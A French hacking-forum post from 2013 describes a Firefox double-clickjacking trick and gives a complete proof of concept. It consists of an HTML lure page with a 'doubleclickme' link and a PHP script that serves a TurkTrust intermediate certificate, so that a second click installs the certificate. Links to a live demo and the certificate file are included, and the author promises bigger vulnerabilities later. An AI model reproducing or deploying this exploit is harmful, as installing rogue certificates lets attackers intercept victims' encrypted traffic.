Affichage linéaire

j0-c · (Modification du message : 01-09-2013, 13h49 par j0-c.)

Video youtube du PoC en action =>

Voila je poste ici une petite vulnérabilité que j'ai dèja signalé sur bugzilla.mozilla.org unpeu plus importante que la dernière, celle ci permet d'installé un certificat SSL et donc même si celui ci est factice ou obsolète, il permet de visiter des site web sécurisé via le même type de certificat.

Le clickjacking consiste a double cliquer sur un lien , au premier clique une boite d'installation de certificat apparaitra et au deuxième clique le certificat sera installé.

Pour l'instant je poste juste des petites failles pour tester la fiabilité du forum , voir si il n'y a pas de personne qui publie ceci à leur nom sur divers autres sites mais si la confiance se fait je vais alors pouvoir vous donner d'avantage de vulnérabilité beaucoup plus importante .

Code PHP :
<!doctype html>
<html lang="fr">
<head>
    <meta charset="utf-8">
    <title>0day</title>
    <style media="screen">

    /* IMPORTANT */
    html {
        height: 100%;
    }
    body {
        height: 100%;
        margin: 0;
        padding: 0;
    }
    #page-table {
        height: 100%;
        width: 100%;
        border-collapse: collapse;
        text-align: center;
    }
    #page-td {
        height: 100%;
        padding: 0;
        vertical-align: middle;
    }
    div#global {
        width: 500px;
        margin: 20px auto;
        text-align: left;
    }

    /* COSM�TIQUE */
    body {
        background: black;
    }
    #page-table {
        background: black;
        color: white;
    }
    #page-table a {color: white;}
    div#global {
        padding: 10px 20px;
        background: black;
        border: 1px solid black;
        font-family: Arial, Helvetica, sans-serif;
    }


    </style>
</head>

<body>
<div id="layer1" style="width:442px; height:200px; position:absolute; left:10px; top:56px; z-index:1;">
    <p><font color="lime">0day exploit double-click-jacking install malicious 
    SSL Certificate</font></p>
</div>
<table id="page-table"><tr><td id="page-td">

<div id="global">
<table style="border-collapse:collapse;" cellspacing="0" width="424">
            <tr>
                <td width="150" height="119" style="border-width:0; border-color:black; border-style:solid;">
                    <p>&nbsp;</p>
                </td>
            </tr>
            <tr>
                <td width="150" height="23" style="border-width:0; border-color:black; border-style:solid;">
                    <p align="right"><a onmousedown="document.location='./156.php';" href="#"><span style="font-size:8pt;">doubleclickme</span></a></td>
            </tr>
        </table>
</div><!--#global-->

</td></tr></table><!--#page-table-->

</body>
</html> 

---
156.php

Code PHP :
<?php
Header("Content-type: application/x-x509-ca-cert"); //no comment
Header("Content-Disposition: inline; filename=turktrust-intermediate-2.pem"); 
readfile("turktrust-intermediate-2.pem"); 
?>

---
turktrust-intermediate-2.pem
certificate : http://alternativ-testing.fr/Research/Mo...iate-2.pem

Live PoC : http://alternativ-testing.fr/Research/Mo...icate2.htm#

Sujets apparemment similaires…
Sujet		Auteur	Réponses	Affichages	Dernier message
	firefox >= 24 & TLS 1.2	gruik	6	597	07-02-2014, 00h19 Dernier message: Serphentas
	Mozilla Firefox low spoofing possible url spoofing with copy , past and go of a link	j0-c	8	829	01-09-2013, 13h54 Dernier message: gruik

Identifiant Mot de passe
S’enregistrer \| Mot de passe oublié ? Se rappeler